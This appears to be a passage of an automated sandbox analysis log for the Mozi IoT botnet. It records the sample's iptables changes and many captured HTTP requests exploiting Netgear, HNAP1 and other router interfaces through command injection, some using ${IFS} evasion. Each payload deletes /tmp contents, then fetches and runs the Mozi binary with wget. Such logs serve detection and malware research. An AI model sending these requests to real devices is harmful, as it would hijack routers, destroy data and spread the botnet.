Source: /bin/sh (PID: 5042)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 184.86.117.97:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 210.190.146.92:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 49.44.132.19:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.124.230.135:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 179.40.62.87:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 204.232.228.51:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
